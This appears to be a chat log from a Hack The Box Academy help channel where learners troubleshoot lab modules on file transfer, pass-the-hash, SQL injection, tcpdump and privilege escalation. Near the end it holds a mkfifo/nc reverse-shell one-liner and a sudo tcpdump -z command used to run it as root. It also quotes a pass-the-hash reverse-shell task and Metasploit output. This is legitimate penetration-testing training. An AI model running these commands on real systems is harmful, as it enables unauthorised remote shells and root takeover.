The problem is that it says "Failed to find a valid ProLab Rasta VPN Server"

And i cant download the Ovpn file in order to initiate a vpn connection

Its greyed out

Its the same error on all lab environments. Ive contacted support. Hopefully ill get a respons

hey guys can i learn binary exploitation and reverse engineering from HTB ?

Maybe with something like that

https://academy.hackthebox.com/module/details/182

https://academy.hackthebox.com/module/details/208

There is a track on main HTB platform that has machine listed that can help you practice BE

Guys, I have a question regarding target Global IP discovery. How do I find that?

https://app.hackthebox.com/tracks/Intro-to-Binary-Exploitation
https://app.hackthebox.com/tracks/Intro-to-Reversing

thank you guys

thats so generos from you

is it free or i need to buy boxes ?

you need vip access 15$ i guess

Let's keep this chat on-topic to htb modules

sure

If you're referring to the modules that payloadbunny linked: you'll need to buy the cubes for them, if you're looking for binary exploitation related boxes or challenges - you'll need vip on the main platform to access any retired content, academy and labs are separate platforms

for the attacking web applications with ffuf. I ran my recursive scan for academy.htb like it directed found the admin subdomain. How do I actually find the ip for this subdomain to add it to my /etc/hosts file so I can perform other scans?

I notice in the module Parameter Fuzzing -GET is has us going after that subdomain but it never added it to the hosts file even though its on a seperate IP

Hi!! I have a question. Doing this type of download can lose bytes of the file? Because the size is not the same... and how can u do it without losing data?

Win-Rm is finicky

But we don't have a better tool

If the md5sum is the same then there's no actual data loss

It's just how the filesystem displays data

i am trying to run this : ||scp htb-student/upload_nix.txt htb-ac-814020@10.10.14.189:/home/|| - but when trying to download it times out - any thoughts here? it is for the linux file transfer portion

if anyone here have done the password attacks module and have a minute for a chat, please let me know if i can dm you. im stuck af and i have an idea of what i can do but i dont want to spend another day if im not pulling on the right direction

sure

anyone help with the above?

yo\

people

if u guys done @sly kelp may I dm u as well? stuck as well with the Password attacks module kek

sure I can try my best to help you guys

thanks thanks

unable to message anyways the question is finding the flag since,
i've cracked 3 ussers already using "crackmapexec --shares"

using smbclient i've already access the smb service but unable to locate the flag since there is no file in the following shares

can you try smbmap as well

look at the Permissions

yeah permissions are only for IPC$ used smbmap as well with 3 cracked usrs

dm me

i sent you request

ahh shit okay there is another

i got it ady

user that contains the flag

im on the pass the hash module and cant access davids file even tho i am david.. any hints?

I think one of the questions on the enumerating AD groups question might be wrong

Has anyone finished this section?

From active directory powerview..

Can anyone assist with this please:

htb-student@nix04:~$|| scp htb-student/upload_nix.txt htb-ac-814020@10.10.14.189:/home/htb-ac-814020/Desktop||
ssh: connect to host 10.10.14.189 port 22: Connection timed out
lost connection

Tuga?

You're trying to ssh back to your pwnbox instance? There might be certain egress rule that are in place that doesn't allow you to connect to outbound 22 port from the target instance.
Not sure why you want to do that, you can simply do the reverse|| htb-ac-814020@<pwnbox-ip>:~$ scp htb-student@<TARGET-IP>:~/htb-student/upload_nix.txt /home/htb-ac-814020/Desktop/.||

The command is from your PwnBox, not from nix04 host.

If you already knew that and are still just playing with trying to ssh to PwnBox from the target instance, you can still do it with some tweaks.

thanks - i'll use that information

I just finished the SQL Injection fundamentals, but... I don't understand 1 thing!
Why UNION payloads start with cn'? I mean... Why cn??? I'm really confused about how at one point they start with cn and this cn initial part makes things work 🤷🏻

what

hey help me please

I am unable to open website on cozyhosting

????

#boxes

cn is just a valid entry in this database, it stands for china, the country code 😉

Thanks a lot, I didn't understand that it was contextualized text. Now I understand! You made my day by solving this riddle 💪

Recheck the module for other ways.

"Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt."

I have no clue what HTB wants from me. I got the julio shell through PtH but now I am lost. Anyone knows what to do?

Module: Password Attacks
Section: Pass the Hash

Can I talk to someone about the Pass the Ticket (PtT) from Linux module. Got the last flag but just want to know why it comes accross when I download it incorrectly.

@unique palm DM Me

For Windows Priv Escalation: DLL Injection, is there some package that supplies the example libary.dll and x.dll to follow along with the section? I can't find anything...

The section keeps mentioning Either compile it or use the precompiled version provided., but doesn't actually reference what it is referring to.

Hello, anybody has idea on this question ? I typed in the switches multiple times and it keeps failing.
" Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)"

tcpdump -r -X capture.pcap . I think I am placing -x in the wrong spot I have tried all possiblities though. Pleae let me know what part am missing.

did you connect via NC?

got it now .. i removed the domain flag in my invoke-hash command and it worked

-XX idk

its a vhost iirc

Thank you. I have tried that as well and didnt work. i tried this in the htb terminal it works
sudo tcpdump -r ~/capture.pcap --print -XX (but they arent taking this answer)

-XXr try this

It is but when i try running a scan against it , it gives no results

a vhost is when multiple subdomains share 1 ip

so think of it like all subdomains in that section were assigned 1 ip

0.0.0.0 academy.htb admin.academy.htb ...

add that to your /etc/hosts

This didnt work either. I have tried multiple option and googled how to print in ascii after packet is read using tcpdump and nothing is working! 😫

Ahhh ok I thought it was multiple ip's

its a problem with the command syntax but i think the right command syntax should be in that section

Oh I have tried harder smarter all .lol The sytax works on a terminal its just not being accepted in the answer box.

you're really close to the answer🦾

If you're referring to writing it this way , sudo tcpdump -Xr ~/tmp/capture.pcap I have tried that too. The same thing happened to the other question in that section and all it needed was a space but it works without on the terminal.

i dont see the need for ~ that directory simply doesn't exist

/tmp/capture.pcap thats where the file is at

Ok, thanks. yeah , nothings seems to work at this point. I will give it a try another time.

Hey guys, I have a question regarding target Global IP discovery. How do I find that?

Can someone help me with this question

You mean public ip stuff? I don't believe there's too much about public ip in academy- as the focus is on internal attacks and defense

yes

im in this level and i stuck

It's gonna be before any command line stuff happens, scroll up and you'll see a HTB{...} flag

i dont see any flag only microsoft and version

Microsoft Windows [Version 10.0.22000.1219]
(c) Microsoft Corporation. All rights reserved.

user0@ACADEMY-ICL11 C:\Users\user0>

Scroll further up

I'm having problems rdp'ing into the password attacks , passing the ticket with windows module. the task before was no prob, and it was actually same ip with different creds. reloaded the target, closed vpn, vpn'd back in. logged out and back in and I'm getting this

Wrap the password in quotes $$ is a variable call

same thing. I never wrap the password and it usually works. this is the first time i've ever had a prob with it.

Single quotes or double quotes

And yes, it does matter

$ and ! are special bash characters, they must be wrapped

or else bash interprets and rewrites them before the program ever sees it

import sys

print(sys.argv[1])

save that as echo.py and then run

python3 echo.py AnotherC0mpl3xP4$$

and youll see what the program actually sees

single quotes actually

I've never had an issue with that before. I went back to the previous section which is pass-the-hash. It's th same target, because it's already spawned and same ip I have an RDP session right now with the same ip address using Administrator and the hash. No problems, trying to login with that password, with or without quotes returns an error.

I was responding to them saying they did try wrapping

Are you wrapping with single quotes or double quotes

You still didn't answer

sorry lol

You also ignored my explanation of the issue and step by step instructions on how you can visualize why its an issue

if you correctly wrapped the password and still doesnt work then sorry its just the wrong pass for that account or that account is blocked from rdp

ok. Now use that as my password, or should it work in quotes.

you need to use quotes, my step by step instructions shows you why

i didn;t see it. until after i repomded to Marcie.

you I seen that, pretty neat. Is that something particular to rdp?

no its particular to bash

No it's bash

ahh gotcha

$ indicates a variable call in bash

$$ itself is a variable

still doesn't work with quotes though. lol

Single quotes or double

then thats not the password for the account

¯_(ツ)_/¯

Should work with Single if it's correct

ok single did work. Thanks. why only single and not double?

Because single is passed as literal string interpretation

powershell, bash and some other scripting languages

uhhh that's so frustrating. get through the modules, usually with not much problem, and something that simple has had me stuck for 2 hrs! smh

Wanna know what's crazier? People have asked that question previously

I hadn't ever had to put quotes around th password, I guess that's why it never even crosed my mind.

Then tell me how you were "wrapping" the password

idk the prevoius modules with the pass the hash, well any of them till now, I've never had to put quotes around it. i was just rdp'd in with the administrators hash with no quotes.

Because hashes for pth don't contain special characters

you should brush up on your linux and bash fundementals

ok,so if it has special characters. because normally if they give you the password, its usually well password.

its linux 101 stuff

^

anyway. Thanks guys.

hey y'all! How do the alloted hours work? are they based on each challenge, like how long each challenge should take, or is it solely based on the amount of time it takes you to finish each challenge and then that gets added up?
Or is it based on the cubes used? I was reading one of the articles for the first challenge that you need to disconnect from the machines you are not using, but I did not find what the walkthrough example was showing.
Or Am I mixing the cubes from Academy with the time allocated on HTB?

the time estimate stuff is complete nonesense. ignore them completely

How about the access to the machines? It says if you have a free account you get 2hours, and VIP+ unlimited access. Do you know how those hours are counted?

Regular VIP gets 24 hours

those are for pwnbox access on the main platform if I remember right, not to the target machines

if you're using your own vm it doesn't affect you

Damn bro got no chill

?ban madf0x

hey there, anybody there passed the module LINUX PRIVILEGE ESCALATION > Environment Enumeration, I escalated to root user, then read the flag.txt but doesnt work as answer

has anyone else had excessive trouble with the labs at the end of the footprinting module? i cant even get past the easy one and i have no idea why. i feel like ive exhausted every single avenue, even finding a HTB{flag} that seemed unrelated to the entire lab

that is not what I have.

the question didn't ask you to get root either

can anyone give me a hand and tell me why this maybe didn't work - I am trying to get into host 2 for the live engagement under webshell/php module

i get this error:

||[] Started reverse TCP handler on 10.10.14.189:4444
[-] Exploit failed: NoMethodError undefined method `get_cookies' for nil:NilClass
[] Exploit completed, but no session was created.||

i've tried this and i still don't get it ... i've been off and on this module for like a week stuck at this one spot ... i have no clue what i'm doing wrong ... the question makes no sense

check your LHOST

@fathom pendant ok

do i have to run from the RDP session also?

yes

ok

so i am assuming i have to file transfer the ||50064.rb|| exploit then?

nope

it's already there

hello

oh ok cool

it might night appear in a search

but you can just use it'

got the flag - ty

Can someone tell me how I can stop my active machines? I tried to follow the steps shown but I see it.

hint focus on the port 2121

for academy?

alright ill look into it more, thanks👍

Hi need help with this :

chatgpt told me to fuck off

he lack of knowledge

and i lack of intelligence

Im getting this error when trying to connect to the OpenVPN. Anyone knows how I can fix it? I connected fine before, IDK what's wrong now.
2023-12-02 00:50:07 GDG6: remote_host_ipv6=n/a
2023-12-02 00:50:07 net_route_v6_best_gw query: dst ::
2023-12-02 00:50:07 sitnl_send: rtnl: generic error (-101): Network is unreachable

is your vm connected to the internet? do a ping 1.1.1.1 and check if there are replies, also try rebooting

I rebooted and it worked. Thanks.

60% of the time, rebooting works every time

@next bronze hey where i can find the provided admin credentials in the DOCUMENTATION & REPORTING - Documentation & Reporting Practice Lab??

first qst

Module: ATTACKING COMMON APPLICATIONS
Section: WordPress - Discovery & Enumeration
Question: Enumerate the host and find a flag.txt flag in an accessible directory.
Status:
- Ran gobuster on / and /wp-admin still nothing.
Appreciate any help. Thanks.

same as your rdp creds

use wordpress tools for wordpress

Module: File Inclusion Section: Log Poisoning Question:Try to use a different technique to gain RCE and read the flag at / --------cant read/write any other log file than: /var/log/apache2/access.log.

So far i poisoned the user agent in first question to get rce - but what other technique can i use?

Hey @fathom pendant thanks for replying. Is there any other source you would refer me to?

Please I Still need help can someone give me a nudge ? thats the question on THreat Hunting & Hunting With Elastic

Module: Linux Escalation
Section:Sudo Rights Abuse
Question: I was practicing the tcpdump exploit mentioned but it did not work

1. I made a file in /tmp and was named .test and was already chmod u+x
   

the content in /tmp/.test:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attackers'ip] >/tmp/f
2. then I typed this command
sudo /usr/bin/tcpdump -ln -i [the ip interface i wanna listen] -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

However, it did not execute the /tmp/.test file

(note1: I have already check the permission and the path of tcpdump, which is correct)
(note2: and I have test that if I just type ./.test, the reverse shell is established sucessfully)
(note3: the below is my tcpdump version:
tcpdump version 4.99.3
libpcap version 1.10.3 (with TPACKET_V3)
OpenSSL 3.0.8 7 Feb 2023
)

Think about how you can search for the specified directory.